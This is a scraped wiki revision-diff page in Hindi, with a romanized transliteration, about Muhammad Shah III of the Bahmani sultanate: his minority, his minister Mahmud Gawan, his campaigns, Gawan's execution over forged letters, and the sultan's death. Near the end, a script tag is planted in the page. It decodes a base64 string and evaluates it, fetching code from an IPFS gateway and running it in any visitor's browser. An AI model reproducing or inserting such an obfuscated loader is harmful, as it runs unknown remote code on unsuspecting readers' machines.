Difference between revisions of "मुहम्मद शाह तृतीय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{incomplete}}" to "")
 
Line 1: Line 1:
<br />
 
 
*मुहम्मद शाह तृतीय बहमनी राज्य का तेरहवाँ (1463-82 ई.) सुल्तान था। सिंहासनासीन होने के समय उसकी उम्र केवल 9 वर्ष की थी और राज्य का सारा प्रबन्ध बड़े ही व्यवस्थित रूप से उसके मंत्री मुहम्मद गवाँ द्वारा संचालित होता था, जिसने [[कोंकण]] और [[गोवा]] के हिन्दू शासकों को पराजित किया था।  
 
*मुहम्मद शाह तृतीय बहमनी राज्य का तेरहवाँ (1463-82 ई.) सुल्तान था। सिंहासनासीन होने के समय उसकी उम्र केवल 9 वर्ष की थी और राज्य का सारा प्रबन्ध बड़े ही व्यवस्थित रूप से उसके मंत्री मुहम्मद गवाँ द्वारा संचालित होता था, जिसने [[कोंकण]] और [[गोवा]] के हिन्दू शासकों को पराजित किया था।  
 
*मुहम्मद शाह (तृतीय) ने 1478 ई. में [[उड़ीसा]] को ध्वस्त कर डाला और 1481 ई. में सुदूर दक्षिण के [[काँची]] या कांजीवरम् नगर को भी लूटा। यद्यपि उसका शासनकाल सैनिक सफलताओं से पूर्ण था, परन्तु उसका अन्त दु:खद हुआ।  
 
*मुहम्मद शाह (तृतीय) ने 1478 ई. में [[उड़ीसा]] को ध्वस्त कर डाला और 1481 ई. में सुदूर दक्षिण के [[काँची]] या कांजीवरम् नगर को भी लूटा। यद्यपि उसका शासनकाल सैनिक सफलताओं से पूर्ण था, परन्तु उसका अन्त दु:खद हुआ।  
 
*मुहम्मद शाह अत्यधिक मद्यपान करता था और जाली चिट्ठियों के आधार पर मुहम्मद गवाँ की स्वामी भक्ति पर संदेह उत्पन्न कराकर 1481 ई. में उसका वध करा दिया गया। इन जाली चिट्ठियों का शीघ्र ही भंडाफोड़ हो गया किन्तु अगले ही वर्ष शोक और मदिरापान के कारण सुल्तान की मृत्यु हो गयी।   
 
*मुहम्मद शाह अत्यधिक मद्यपान करता था और जाली चिट्ठियों के आधार पर मुहम्मद गवाँ की स्वामी भक्ति पर संदेह उत्पन्न कराकर 1481 ई. में उसका वध करा दिया गया। इन जाली चिट्ठियों का शीघ्र ही भंडाफोड़ हो गया किन्तु अगले ही वर्ष शोक और मदिरापान के कारण सुल्तान की मृत्यु हो गयी।   
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक= प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==संबंधित लेख==
 +
{{मराठा साम्राज्य}}
 
[[Category:इतिहास_कोश]][[Category:मराठा_साम्राज्य]][[Category:मुग़ल_साम्राज्य]]
 
[[Category:इतिहास_कोश]][[Category:मराठा_साम्राज्य]][[Category:मुग़ल_साम्राज्य]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:01, 13 March 2011

  • muhammad shah tritiy bahamani rajy ka terahavaan (1463-82 ee.) sultan tha. sianhasanasin hone ke samay usaki umr keval 9 varsh ki thi aur rajy ka sara prabandh b de hi vyavasthit roop se usake mantri muhammad gavaan dvara sanchalit hota tha, jisane koankan aur gova ke hindoo shasakoan ko parajit kiya tha.
  • muhammad shah (tritiy) ne 1478 ee. mean u disa ko dhvast kar dala aur 1481 ee. mean sudoor dakshin ke kaanchi ya kaanjivaramh nagar ko bhi loota. yadyapi usaka shasanakal sainik saphalataoan se poorn tha, parantu usaka ant du:khad hua.
  • muhammad shah atyadhik madyapan karata tha aur jali chitthiyoan ke adhar par muhammad gavaan ki svami bhakti par sandeh utpann karakar 1481 ee. mean usaka vadh kara diya gaya. in jali chitthiyoan ka shighr hi bhandapho d ho gaya kintu agale hi varsh shok aur madirapan ke karan sultan ki mrityu ho gayi.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh